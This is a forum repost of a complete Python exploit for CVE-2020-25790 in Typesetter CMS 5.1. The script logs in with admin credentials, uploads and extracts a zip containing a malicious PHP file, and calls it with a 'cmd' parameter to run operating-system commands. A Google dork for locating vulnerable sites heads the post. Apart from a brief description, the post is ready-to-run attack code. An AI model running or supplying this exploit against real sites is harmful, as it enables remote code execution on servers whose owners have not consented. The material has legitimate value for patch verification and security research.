Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)

 Share


Recommended Posts

# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790

######## Description ########
#
# The CMS Typesetter has functionality (web interface) where it is possible
# through an account with privileges to perform uploads. Through this
# functionality, it is possible to upload a .zip file that contains a
# malicious .php file. In the same functionality, there is also the
# possibility to extract the file through the same web interface, the
# attacker only needs to extract the .zip that was previously loaded and
# click on the malicious .php file to execute commands in the operating
# system.
#

######## Exploit with Poc ########


https://github.com/t0gu/CVE-2020-25790

####### Code #######


# see the poc at https://github.com/t0gu/CVE-2020-25790

import argparse
from bs4 import BeautifulSoup
import requests
import sys
import  re


import urllib3
from urllib3.exceptions import InsecureRequestWarning

banner = """ 

 
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗  ██████╗       ██████╗ ███████╗███████╗ █████╗  ██████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔═████╗      ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗    ██╔╝╚██████║██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║   ██╔╝  ╚═══██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗╚██████╔╝      ███████╗███████║   ██║   █████╔╝╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝       ╚══════╝╚══════╝   ╚═╝   ╚════╝  ╚═════╝ 
                                                                                                                                                                                                                    
by: t0gu


usage: main.py [-h] -p PASSWORD -l LOGIN -u URL

==> Exploit for CVE 2020-25790

optional arguments:
  -h, --help            show this help message and exit
  -p PASSWORD, --password PASSWORD
                        ==> admin password
  -l LOGIN, --login LOGIN
                        ==> admin login
  -u URL, --url URL     ==> main URL

  """

print(banner)
menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790")
menu.add_argument("-p", "--password", required=True, help="==> admin password")
menu.add_argument("-l", "--login", required=True, help="==> admin login")
menu.add_argument("-u", "--url", required=True, help="==> main URL")
menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside")
args = menu.parse_args()

login = args.login
password = args.password
url = args.url
file = args.file


PROXIES = proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080",
}


class Exploit:

    def __init__(self, login, password, url, file):
        self.login = login
        self.password = password
        self.url = url
        self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari"
        self.file = open(file, 'rb')

    def get_nounce(self):
        try:
            url = self.url + "/Admin"
            r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False)
            data = r.text
            soap_obj = BeautifulSoup(data, 'html.parser')
            for inp in soap_obj.find_all("input"):
                for v in inp:
                    nounce = v['value']
                    if nounce != None or nounce != "":
                        return nounce
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_hash_folders(self):

        cookie_auth = self.get_cookies()
        hash_verified = self.get_verified()
        data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False)
            json_data = r.json()
            hash_dir = json_data['files'][2]['hash']
            return hash_dir
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

    def get_cookies(self):

        nounce = self.get_nounce()
        if nounce:
            try:
                url = self.url + "/Admin"
                data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '',
                             'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '',
                             'remember': 'on', 'verified': ''}
                r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False,
                                  headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'})
                cookie_admin = r.headers['Set-Cookie']
                cookie_name = cookie_admin.split(':')[0].split('=')[0]
                cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0]

                if cookie_name == None or cookie_name == "":
                    if cookie_value == None or cookie_value == "":
                        print("==> Something went wrong while login")
                else:
                    data = f"{cookie_name}={cookie_value};"
                    return data
            except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e:
                print(f'==> Error while login {e}')

    def upload_zip(self):
        url = self.url + '/Admin_Finder'
        hash_verified = self.get_verified()
        hash_dir = self.get_hash_folders()
        auth_cookie = self.get_cookies()

        try:
            print(f"==> Uploading file: {self.file}")
            data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified}
            r = requests.post(url=url, verify=False, timeout=10,
                              headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file})
            hash_file = r.json()['added'][0]['hash']
            self.extract_file(auth_cookie, hash_file, hash_verified)
        except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
            print(f"==> Error while uploading {e}")


    def extract_file(self, auth_cookie, hash_file, hash_verified):
        data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file}
        try:
            url = self.url + "/Admin_Finder"
            r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            name_file = r.json()['added'][0]['name']
            print(f"==> All Hashes are collected from: {name_file}") 
            self.xpl(auth_cookie,name_file)
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')


    def xpl(self, auth_cookie, name_file):
        try:
            url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
            new_url = url.replace("index.php", "")
            print(f"==> Try to exploit: {new_url}")
            r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            pattern = r'<pre>(.*?)</pre>'
            m = re.search(pattern, r.text.replace("\n", ""))
            if m is not None and m != "":
                print(f"==> Vulnerable: {m.group(1)}")
        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')


    def get_verified(self):
        try:
            url = self.url + "/Admin/Uploaded"
            auth_cookie = self.get_cookies()
            r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
            data = r.text
            pattern_regex = r'"verified":"(.*)"}'
            m = re.search(pattern_regex, data)
            if m is not None or m != "":
                return m.group(1)

        except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
            print(f'==> Error {e}')

if __name__ == "__main__":
    obj = Exploit(login, password, url, file)
    obj.upload_zip()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...